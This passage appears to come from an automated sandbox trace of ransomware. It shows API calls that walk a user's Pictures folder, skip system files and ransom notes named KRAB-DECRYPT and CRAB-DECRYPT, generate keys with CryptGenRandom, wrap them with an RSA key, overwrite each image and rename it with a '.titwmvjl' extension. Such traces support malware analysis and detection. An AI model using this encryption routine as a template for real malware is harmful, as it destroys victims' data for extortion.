(lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\3UaE2H4hje.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\3uae2h4hje.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\3UaE2H4hje.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\3uae2h4hje.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0094.152] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.153] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0094.153] lstrcmpW (lpString1="6eApIP HV.jpg", lpString2=".") returned 1 [0094.153] lstrcmpW (lpString1="6eApIP HV.jpg", lpString2="..") returned 1 [0094.153] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\", lpString2="6eApIP HV.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\6eApIP HV.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\6eApIP HV.jpg" [0094.153] lstrlenW (lpString=".titwmvjl") returned 9 [0094.153] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\6eApIP HV.jpg") returned 92 [0094.153] VirtualAlloc (lpAddress=0x0, dwSize=0xf8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.153] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\6eApIP HV.jpg.titwmvjl") returned 101 [0094.153] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\6eApIP HV.jpg") returned 92 [0094.153] lstrlenW (lpString=".jpg") returned 4 [0094.153] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.153] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".jpg ") returned 5 [0094.154] lstrcmpiW (lpString1=".jpg", lpString2=".titwmvjl") returned -1 [0094.154] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.154] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\6eApIP HV.jpg") returned 92 [0094.154] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\6eApIP HV.jpg") returned 92 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="desktop.ini") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="autorun.inf") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="ntuser.dat") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="iconcache.db") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="bootsect.bak") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="boot.ini") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="ntuser.dat.log") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="thumbs.db") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="KRAB-DECRYPT.html") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="CRAB-DECRYPT.html") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="CRAB-DECRYPT.txt") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="ntldr") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="NTDETECT.COM") returned -1 [0094.154] lstrcmpiW (lpString1="6eApIP HV.jpg", lpString2="Bootfont.bin") returned -1 [0094.154] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\6eApIP HV.jpg") returned 92 [0094.154] lstrlenW (lpString=".jpg") returned 4 [0094.154] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.155] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".jpg ") returned 5 [0094.155] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.155] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.155] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\6eApIP HV.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\6eapip hv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0094.156] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.156] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0094.157] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.157] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.157] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0094.157] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.158] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.158] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.158] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0094.158] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.158] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.158] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.158] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.159] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0094.159] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.159] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.159] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.159] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0094.159] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.160] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.160] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.160] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.160] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0094.160] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.160] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5035b8) returned 1 [0094.160] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.161] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0094.161] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.161] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0094.161] GetLastError () returned 0x0 [0094.161] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.161] CryptDestroyKey (hKey=0x5035b8) returned 1 [0094.161] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.161] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.161] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.162] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0094.162] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.162] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5038f8) returned 1 [0094.162] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.162] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0094.162] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.163] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0094.163] GetLastError () returned 0x0 [0094.163] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.163] CryptDestroyKey (hKey=0x5038f8) returned 1 [0094.163] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.163] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.163] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.164] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.164] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0xdcde, lpOverlapped=0x0) returned 1 [0094.177] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffff2322, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.178] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xdcde, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0xdcde, lpOverlapped=0x0) returned 1 [0094.179] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.179] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0094.180] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.185] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.186] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.186] CloseHandle (hObject=0x2d4) returned 1 [0094.187] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\6eApIP HV.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\6eapip hv.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\6eApIP HV.jpg.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\6eapip hv.jpg.titwmvjl"), dwFlags=0x1) returned 1 [0094.188] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.188] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0094.188] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0094.188] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0094.188] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\d2ca4a09d2ca4deb61a.lock" [0094.188] lstrlenW (lpString=".titwmvjl") returned 9 [0094.188] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\d2ca4a09d2ca4deb61a.lock") returned 103 [0094.188] VirtualAlloc (lpAddress=0x0, dwSize=0x10e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.188] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 112 [0094.190] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\d2ca4a09d2ca4deb61a.lock") returned 103 [0094.190] lstrlenW (lpString=".lock") returned 5 [0094.190] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.191] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0094.191] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.191] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.191] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0094.191] lstrcmpW (lpString1="pGm56TTUh5c hWZu.png", lpString2=".") returned 1 [0094.191] lstrcmpW (lpString1="pGm56TTUh5c hWZu.png", lpString2="..") returned 1 [0094.191] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\", lpString2="pGm56TTUh5c hWZu.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\pGm56TTUh5c hWZu.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\pGm56TTUh5c hWZu.png" [0094.191] lstrlenW (lpString=".titwmvjl") returned 9 [0094.191] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\pGm56TTUh5c hWZu.png") returned 99 [0094.191] VirtualAlloc (lpAddress=0x0, dwSize=0x106, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.191] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\pGm56TTUh5c hWZu.png.titwmvjl") returned 108 [0094.192] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\pGm56TTUh5c hWZu.png") returned 99 [0094.192] lstrlenW (lpString=".png") returned 4 [0094.192] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.192] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".png ") returned 5 [0094.192] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0094.192] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.192] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\pGm56TTUh5c hWZu.png") returned 99 [0094.192] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\pGm56TTUh5c hWZu.png") returned 99 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="desktop.ini") returned 1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="autorun.inf") returned 1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="ntuser.dat") returned 1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="iconcache.db") returned 1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="bootsect.bak") returned 1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="boot.ini") returned 1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="ntuser.dat.log") returned 1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="thumbs.db") returned -1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="KRAB-DECRYPT.html") returned 1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="CRAB-DECRYPT.html") returned 1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.192] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="ntldr") returned 1 [0094.193] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="NTDETECT.COM") returned 1 [0094.193] lstrcmpiW (lpString1="pGm56TTUh5c hWZu.png", lpString2="Bootfont.bin") returned 1 [0094.193] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\pGm56TTUh5c hWZu.png") returned 99 [0094.193] lstrlenW (lpString=".png") returned 4 [0094.193] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.193] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".png ") returned 5 [0094.193] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.193] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.193] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\pGm56TTUh5c hWZu.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\pgm56ttuh5c hwzu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0094.194] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.194] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0094.195] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.195] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.195] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0094.195] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.196] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.196] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.196] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0094.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.196] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.196] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.197] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0094.197] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.197] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.197] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.197] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0094.198] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.198] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.198] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.198] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.198] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0094.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.199] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503838) returned 1 [0094.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.199] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0094.199] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.200] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0094.200] GetLastError () returned 0x0 [0094.200] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.200] CryptDestroyKey (hKey=0x503838) returned 1 [0094.200] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.200] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.200] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.201] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0094.201] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.201] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503338) returned 1 [0094.201] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.201] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0094.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.202] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0094.202] GetLastError () returned 0x0 [0094.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.202] CryptDestroyKey 